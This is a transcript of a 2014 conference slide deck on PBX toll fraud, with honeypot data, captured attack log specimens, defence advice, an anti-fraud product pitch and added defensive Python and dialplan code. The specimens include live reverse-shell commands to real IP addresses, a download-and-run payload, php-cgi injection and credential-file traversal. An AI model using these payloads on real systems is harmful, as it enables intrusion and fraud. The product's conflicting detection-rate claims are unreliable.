No More Fraud, Astricon, Las Vegas 2014

Date post: 14-Jul-2015
Upload: flavio-goncalves
Transcript

No More Fraud!

Let’s say “enough is enough”

About me

Flavio E. Goncalves

CTO of SipPulse (www.sippulse.com)

Turnkey solutions for VoIP providers and Telcos.

Anti-Fraud Solutions

Why should you care?

Exposure for a single T1 line

43200 min/month, US$5/min, 23 lines

US$ 4,968,000 per month

Why are they doing it?

#1 Allocate a number and a recording at a PRN (premium rate number) provider

#2 Find a vulnerable device

Using Shodan

#3 Make calls and cash in

INTELLIGENCE GRABBED IN HONEYPOTS

Distribution by country (honeypot hits per country, chart values paired with their labels in order)

US 117636
FR 105603
DE 78656
PS 32795
RU 11910
TW 11120
SC 10702
SG 3736
GB 2836
CA 1978

TOP Prefixes

+972 Palestine

+44 Great Britain

+86 China

+20 Egypt

TOP 5 PBX Exploits in September/October

1. Shellshock

2. PHP/LAMP Injection

3. SQL injection in Trixbox

4. Linksys remote code execution

5. FreePBX Remote Code Execution

#1 Shellshock

• Exploit Date: 09/2014

Specimen:

• [26/Sep/2014:13:13:57 +0000] "GET / HTTP/1.0" 200 414 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.14/3333 0>&1'"

• [26/Sep/2014:13:16:54 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 507 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.14/3333 0>&1'"

#2 SQL injection in Trixbox

• Exploit Date: 03/2014 - http://www.exploit-db.com/exploits/32239/

Specimen:

• [25/Sep/2014:23:52:29 +0000] "GET /web-meetme/conf_cdr.php?bookId=1 HTTP/1.1" 404 485 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.15.3 zlib/1.2.3 libidn/1.18 libssh2/1.4.2"

#3 Linksys Remote Code Execution

• Exploit Date: 02/2014 - http://www.exploit-db.com/exploits/31683/

Specimen:

• [25/Sep/2014:12:50:16 +0000] "GET /tmUnblock.cgi HTTP/1.1" 400 538 "-" "-"

#4 LAMP Attacks

• Apache/PHP Remote Exploit

• Exploit date: 10/2013

• Specimen:

• POST /cgi-bin/php5?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n

• [26/Sep/2014:15:43:38 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 492 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"

#5 CallMeNum (Demo)

• Exploit date: 03/2012

• Specimen:

• GET /recordings/misc/callme_page.php?action=c&callmenum=888@ext-featurecodes/n

• Application: system

• Data: perl -MIO -e '$p=fork;exit,if($p); $c=new IO::Socket::INET(PeerAddr,"x.y.z.w:4446"); STDIN->fdopen($c,r); $~->fdopen($c,w); $c->write("]QAfH#.Eq\ncmp\n"); system$_ while<>;'

Unknown Exploits

• Jul/2014

• Specimen:

• [03/Jul/2014] "GET /recordings/locale/sv_SE/LC_MESSAGES/LC/index.php

• [03/Jul/2014] "GET /fuxkkk.php

• [03/Jul/2014] "GET /recordings/theme/alexpass.php

Still uncommon (ports rarely attacked so far)

• MANAGER PORT - 5038

• H323 - 1720

• MGCP - 5036

• TFTP - 69

• IAX2 - 4569

How hackers are getting into your PBX

• #1 – SIP brute force (Fail2ban is effective)

• #2 – HTTP exploitation

• #3 – Attacks on phones

• #4 – Caller ID spoofing

• #5 – Billing/credit card fraud

Part III – How to defend

#1 Patch everything and upgrade frequently

#2 Use a Firewall

#3 Use a Session Border Controller

#4 Use Encryption

#5 Use an Anti-Fraud System

#1 Patch everything, update frequently

• Effectiveness: Low

• Risk: High

• Cost: High

#2 Use a firewall or configure iptables properly

• Effectiveness: High

• Risk: Medium

• Cost: Low

• Absolutely a must do. At the very least: no Internet access to SSH, no Internet access to HTTP/HTTPS.

• Does not prevent attacks on phones

#3 Use a Session Border Controller

• Effectiveness: Medium

• Risk: Medium

• Cost: Very High

#4 Use encryption

• Effectiveness: Medium

• Risk: Medium

• Cost: High if you intend to do mutual authentication

#5 Use an AntiFraud System

• Effectiveness: High

• Risk: Very Low

• Cost: Medium

• Comments: Can detect 99.999% of the attacks; it also protects against caller ID spoofing, social engineering and phone attacks.

• Limitations: Firewall restrictions are required to prevent tampering with the anti-fraud rules.

Working Together in 2 steps

1. Make sure your customers’ firewall and fail2ban are configured right (You)

2. Partner with us to use TFPS on your customers (Us)

Fraud Prevention for All

www.tfps.co

How effective is an anti-fraud solution?

• 99.989% just by protocol signature.

• Number obtained by comparing the attacks registered on the honeypot against the rules.

Anti-Fraud Effectiveness

(Pie chart: detected vs. undetected attacks)

1. 99.89% of the attacks prevented by signature detection

2. Collaborative protection. One PBX hacked automatically blocks the IP for the others

3. Mechanism: SIP Redirect

• No additional hardware required.

•Available for OpenSIPS/Freeswitch/Asterisk

www.tfps.co || tfps.sippulse.com

Asterisk Code

[from-internal] ; Replace with the context your users dial from
; FPS for international calls: tag the call with the source IP, the user agent
; and the number of concurrent calls, then hand it to the anti-fraud peer "fps"
exten => _011[1-9].,1,Set(ip=${CHANNEL(recvip)})
 same => n,SIPAddHeader(P-Received: ${ip})
 same => n,Set(ua=${CHANNEL(useragent)})
 same => n,SIPAddHeader(P-UA: ${ua})
 same => n,Set(GROUP()=fps)
 same => n,Set(ncalls=${GROUP_COUNT(fps)})
 same => n,SIPAddHeader(P-Calls: ${ncalls})
 same => n,Set(_original=${EXTEN}) ; the leading underscore makes the dialled number inherit into the redirected leg
 same => n,Dial(SIP/fps/${EXTEN:2})

Asterisk Code

[fps] ; The 302 redirect from the anti-fraud peer lands here, prefixed R (rejected) or A (approved)
; For calls not approved
exten => _R.,1,Answer()
 same => n,Playback(unauthorized) ; (Customize here to generate an error message)
 same => n,Hangup(21)
; For calls approved
exten => _A.,1,Answer()
 same => n,Dial(SIP/provider/${original}) ; (Customize here to send the call ahead)
 same => n,Hangup(16)
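To show the exchange the two contexts above depend on, here is an added example (not the deck's code and not the TFPS product) of a minimal anti-fraud decision on the peer side: it parses the INVITE carrying the P-Received, P-UA and P-Calls headers the dialplan adds, applies illustrative rules, and answers with a 302 whose Contact user part starts with A or R so the call lands on the _A. or _R. patterns of the [fps] context. The shared blocklist, the concurrency limits and the lower limit for the deck's top fraud prefixes are assumptions, not the product's actual rules.

```python
import re
# Constructed INVITE as the [from-internal] dialplan above would send it to the
# anti-fraud peer (only the headers this example needs are shown).
SAMPLE_INVITE = (
    "INVITE sip:4420712345678@fps.example SIP/2.0\r\n"
    "P-Received: 203.0.113.9\r\n"
    "P-UA: Zoiper rv2.8.10\r\n"
    "P-Calls: 7\r\n"
    "\r\n"
)
# Hypothetical rule inputs (not the product's real rules): a block list shared by all
# protected PBXs, a ceiling on concurrent international calls, and a lower ceiling
# for the destinations the deck lists as top fraud prefixes.
SHARED_BLOCKLIST = {"198.51.100.44"}
MAX_CONCURRENT = 5
RISKY_PREFIXES = ("972", "44", "86", "20")
RISKY_LIMIT = 2

def parse_invite(msg):
    """Return (dialled number from the Request-URI, lower-cased header dict)."""
    lines = msg.split("\r\n")
    m = re.match(r"INVITE sip:([^@;]+)@", lines[0])
    if not m: raise ValueError("not an INVITE")
    headers = {}
    for line in lines[1:]:
        if not line: break          # empty line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return m.group(1), headers

def evaluate(number, headers):
    """Decide one call: ('A', reason) approves, ('R', reason) rejects."""
    src = headers.get("p-received", "")
    if src in SHARED_BLOCKLIST:
        return "R", "source %s is in the shared blocklist" % src
    limit = RISKY_LIMIT if number.startswith(RISKY_PREFIXES) else MAX_CONCURRENT
    ncalls = int(headers.get("p-calls", "0"))   # GROUP_COUNT includes this call
    if ncalls > limit:
        return "R", "%d concurrent calls exceeds limit %d" % (ncalls, limit)
    return "A", "within limits"

def redirect(verdict, number, host):
    """302 whose Contact user part lands on _A. or _R. in the [fps] context."""
    return ("SIP/2.0 302 Moved Temporarily\r\n"
            "Contact: <sip:%s%s@%s>\r\n"
            "Content-Length: 0\r\n\r\n" % (verdict, number, host))

def handle(msg, host="pbx.example"):
    number, headers = parse_invite(msg)
    verdict, reason = evaluate(number, headers)
    return verdict, reason, redirect(verdict, number, host)
```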

Beyond blacklists:

Compared to other anti-fraud solutions!

• Pluggable

• No Additional Hardware

• Small traffic to be analyzed

• Small risk, only a few calls can be affected.

• Easy handling of outages

ANTI-FRAUD, HOW-TO (DEMO)

Thank You!

• e-mail: [email protected]

• skype: flaviogoncalves1

• Twitter: @asteriskguide

• blog.tfps.co

Backup Slides

#6 FreePBX 2.x Code Execution

• Specimen:

• [03/Jul/2014:17:28:41 +0000] "GET /admin/config.php?display=auth&handler=api&function=system&args=cd%20/tmp;rm%20-f%20e;wget%20http://93.170.130.201:3003/e;perl%20e;rm%20-f%20e HTTP/1.1" 404 534 "-" "-"

#4 VTIGER Exploit (Lots of variations)

• 0001189: Vtiger CRM - php inject vulnerability

• Specimen

• 108.175.157.211 - - [25/Jul/2014:19:28:59 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../..//etc/amportal.conf%00 HTTP/1.1" 404 574 "-" "-"

• 93.170.130.201 - - [03/Jul/2014:21:15:11 +0000] "POST /vtigercrm/graph.php?module=..%2Fmodules%2FSettings&action=savewordtemplate HTTP/1.1" 404 537 "-" "-"

#4 PHP Code Injection Vulnerability

• Specimen:

• [03/Jul/2014:13:57:37 +0000] "GET /admin/footer.php?php=info&ip=perl%20-MIO%20-e%20%27%24p%3Dfork%3Bexit%2Cif(%24p)%3B%20%24c%3Dnew%20IO%3A%3ASocket%3A%3AINET(PeerAddr%2C%2293.170.130.201%3A3333%22)%3B%20STDIN-%3Efdopen(%24c%2Cr)%3B%20%24~-%3Efdopen(%24c%2Cw)%3B%20%24c-%3Ewrite(%22%5DQAfH%23.Eq%5Cnunk%5Cn%22)%3B%20system%24_%20while%3C%3E%3B%27 HTTP/1.1" 404 534 "-" "-"

• "GET /admin/footer.php?php=info&ip=perl -MIO -e '$p=fork;exit,if($p); $c=new IO::Socket::INET(PeerAddr,"93.170.130.201:3333"); STDIN->fdopen($c,r); $~->fdopen($c,w); $c->write("]QAfH#.Eq\nunk\n"); system$_ while<>;'

#9 FreePBX Extension Dump Exploitation

• Specimen:

• 184.105.240.203 - - [08/Jul/2014:01:33:42 +0000] "POST /admin/cdr/call-log.php?handler=cdr&s=&t=&order=calldate&sens=DESC&current_page=0/admin/cdr/call-comp.php HTTP/1.1" 404 484 "-" "-"

#6 Freeswitch Attacks

GET /freeswitch/app/provision/index.php?mac=df-df-df-df-df-df&template=linksys
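As an added example (not part of the deck and not the TFPS product), the following Python scans web-server access logs for the request signatures shown in the TOP 5 PBX exploit specimens (Shellshock, Trixbox conf_cdr.php, Linksys tmUnblock.cgi, php-cgi argument injection, CallMeNum) and in the backup-slide specimens (FreePBX config.php and footer.php, vtiger traversal, CDR dump, FreeSWITCH provisioning). It URL-decodes each line first so the %XX-encoded variants match the same rule, and tallies hits per source address the way a fail2ban filter would. The regexes, the ban threshold and the sample log lines are constructed for this example.

```python
import re
from collections import Counter
from urllib.parse import unquote
# Request signatures distilled from the specimens in this deck (main and backup slides),
# matched against the URL-decoded line so %XX-encoded php-cgi/vtiger variants match too.
SIGNATURES = {
    "shellshock":            r"\(\)\s*\{\s*:;\s*\}\s*;",
    "trixbox-conf_cdr":      r"/web-meetme/conf_cdr\.php\?bookId=",
    "linksys-tmUnblock":     r"/tmUnblock\.cgi",
    "php-cgi-args":          r"/cgi-bin/php5?\?-d\b",
    "freepbx-callmenum":     r"/recordings/misc/callme_page\.php\?.*callmenum=",
    "freepbx-config-system": r"/admin/config\.php\?.*function=system",
    "freepbx-footer-php":    r"/admin/footer\.php\?php=",
    "vtiger-traversal":      r"/vtigercrm/.*\.\./",
    "freepbx-cdr-dump":      r"/admin/cdr/call-log\.php",
    "freeswitch-provision":  r"/freeswitch/app/provision/index\.php\?mac=",
}
COMPILED = {name: re.compile(pat, re.I) for name, pat in SIGNATURES.items()}
LINE_RE = re.compile(r"^(?:(?P<ip>\S+) - - )?\[(?P<ts>[^\]]+)\]")  # client addr, timestamp

def classify(line):
    """Names of every signature that matches one access-log line."""
    decoded = unquote(line)
    return [name for name, rx in COMPILED.items() if rx.search(decoded)]

def scan_log(lines):
    """List of (ip, timestamp, signature) for every hit; ip/ts are None if absent."""
    hits = []
    for line in lines:
        names = classify(line)
        if not names: continue
        m = LINE_RE.match(line)
        ip, ts = (m.group("ip"), m.group("ts")) if m else (None, None)
        hits.extend((ip, ts, name) for name in names)
    return hits

def offenders(hits, threshold=2):
    """Sources with at least `threshold` hits: the ban list a fail2ban jail would act on."""
    counts = Counter(ip for ip, _, _ in hits if ip)
    return {ip: n for ip, n in counts.items() if n >= threshold}

# Constructed sample lines modelled on the deck's specimens; 203.0.113.0/24 is documentation space.
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Sep/2014:13:13:57 +0000] "GET / HTTP/1.0" 200 414 "-" "() { :;}; echo vulnerable"',
    '203.0.113.9 - - [25/Sep/2014:23:52:29 +0000] "GET /web-meetme/conf_cdr.php?bookId=1 HTTP/1.1" 404 485 "-" "curl/7.19.7"',
    '203.0.113.9 - - [26/Sep/2014:15:43:38 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E HTTP/1.1" 404 492 "-" "-"',
    '203.0.113.9 - - [25/Jul/2014:19:28:59 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../..//etc/amportal.conf%00 HTTP/1.1" 404 574 "-" "-"',
    '203.0.113.21 - - [07/Oct/2014:09:00:00 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]
```

Feed real access-log lines to scan_log() and hand the offenders() result to your firewall or fail2ban action; only signature hits count, so ordinary traffic from the same address does not raise the tally.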

#4 Caller ID Spoofing

• 1 - Send 1 million calls and cancel

• 2 - Fake the callerID to a PRN

• 3 - Wait for the call back.

Open Source is a Target!

•We are seeing scans for:

• Vicidial

• Astpp

• phpMyAdmin (hot)

• Tomcat

• Jboss

• FreeSwitch

First way to protect

1. Make sure your system is protected by a firewall

   1. Vulnerability scan

   2. Apply firewall rules to prevent unauthorized access to the server

   3. Use .htaccess and implement dual authentication

#5 Recent SIP phone vulnerabilities

• Cisco 3905 - http://www.cvedetails.com/cve/CVE-2014-0721/ (10)

• Cisco SPA 3XX, 5XX http://www.cvedetails.com/cve/CVE-2014-3313/ (4.3)

• Cisco SPA 3XX, 5XX http://www.cvedetails.com/cve/CVE-2014-3312/ (6.9)

• Yealink - http://www.cvedetails.com/cve/CVE-2014-3427

• Yealink - http://www.cvedetails.com/cve/CVE-2014-3428/


Recommended